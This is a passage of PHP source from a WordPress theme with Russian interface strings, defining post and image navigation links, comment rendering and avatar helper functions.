				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Следующие записи <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Предыдущие записи', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущие записи', THEME_NS) : __('Следующие записи', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">сказал:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s - %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Ссылка:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}